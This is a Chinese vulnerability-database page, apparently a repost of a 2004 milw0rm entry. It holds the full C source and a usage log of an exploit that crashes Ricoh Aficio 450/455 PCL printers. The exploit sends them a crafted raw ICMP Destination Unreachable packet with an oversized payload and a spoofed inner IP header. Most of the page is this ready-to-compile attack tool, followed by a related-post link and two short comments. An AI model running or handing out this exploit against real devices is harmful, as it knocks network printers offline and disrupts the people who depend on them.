Ricoh Aficio 450/455 PCL 5e Printer – ICMP Denial of Service
| 漏洞ID | 1054816 | 漏洞类型 | |
| 发布时间 | 2004-12-15 | 更新时间 | 2004-12-15 |
![图片[1]-Ricoh Aficio 450/455 PCL 5e Printer – ICMP Denial of Service-安全小百科](https://p0.ssl.qhimg.com/dr/29_50_100/t01bbbb9ac447dabd6a.png) CVE编号
|
N/A |
![图片[2]-Ricoh Aficio 450/455 PCL 5e Printer – ICMP Denial of Service-安全小百科](https://p0.ssl.qhimg.com/dr/29_150_100/t01cd54df57948e31ea.png) CNNVD-ID
|
N/A |
| 漏洞平台 | Hardware | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
* RICOH Aficio 450/455 PCL 5e Printer ICMP DOS vulnerability Exploit.
* DATE: 12.15.2004
* Vuln Advisory : Hongzhen Zhou<felix__zhou _at_ hotmail _dot_ com>
* Exploit Writer : x90c(Kyong Joo)@www.chollian.net/~jyj9782
*
* Testing -----------------------------------------------
* root@testbed:~/raw# gcc -o rpcl_icmpdos rpcl_icmpdos.c
* root@testbed:~/raw# ./rpcl_icmpdos
* Usage: ./rpcl_icmpdos <victim>
* root@testbed:~/raw# ./rpcl_icmpdos 192.168.2.4
* exploit sent ok() = ..x-_-x..
* root@testbed:~/raw#
*
*/
#include<sys/types.h>
#include<sys/socket.h>
#include<netinet/in.h>
#include<arpa/inet.h>
#include<linux/ip.h>
#include<linux/icmp.h>
unsigned short cksum(unsigned short *buf, int len);
struct icmp_packet{
struct icmphdr icmp;
struct iphdr inip;
unsigned char bigger[90]; // STEP1: Bigger Data(ICMP Header(8)+ inip(20) + 90(bigger data))
} packet;
/* ########################
* # Entry Point #
* ########################
*/
int main(int argc, char *argv[]){
struct sockaddr_in ca;
int sockfd, ret;
if(argc<2){
printf("Usage: %s <victim>n", argv[0]);
exit(-1);
}
sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
memset(&packet, 0, sizeof(packet));
packet.icmp.type = 3; // STEP2: Destination Unreachable.
packet.icmp.code = 1;
packet.icmp.un.echo.id = getpid();
packet.icmp.un.echo.sequence = 0;
packet.inip.ihl = 5;
packet.inip.version = 4;
packet.inip.tot_len = htons(20);
packet.inip.id = htons(9090);
packet.inip.ttl = 90;
packet.inip.protocol = IPPROTO_TCP; // STEP3: IPPROTO_UDP also useable.
packet.inip.saddr = inet_addr("127.0.0.1");
packet.inip.daddr = inet_addr("127.0.0.1");
packet.inip.check = (unsigned short) cksum((unsigned short *)&packet.inip, 20);
packet.icmp.checksum = cksum((void *)&packet, sizeof(packet));
memset(&ca, 0, sizeof(ca));
ca.sin_family = AF_INET;
ca.sin_addr.s_addr = inet_addr(argv[1]);
if((sendto(sockfd, &packet, sizeof(packet), 0, (struct sockaddr *)&ca, sizeof(ca))) == sizeof(packet))
printf("exploit sent ok() = ..x-_-x..n");
else
printf("exploit sent failed() = ..o^O^o..n");
close(sockfd);
}
/* ########################
* # Internet Checksum #
* ########################
*/
unsigned short cksum(unsigned short *buf, int len){
register unsigned long sum;
for(sum = 0; len > 0; len--) sum += *buf++;
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
return ~sum;
}
// milw0rm.com [2004-12-15]相关推荐: WWW File Share Pro目录遍历漏洞
WWW File Share Pro目录遍历漏洞 漏洞ID 1201955 漏洞类型 路径遍历 发布时间 2004-02-17 更新时间 2004-02-17 CVE编号 CVE-2004-0059 CNNVD-ID CNNVD-200402-060 漏洞平台…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666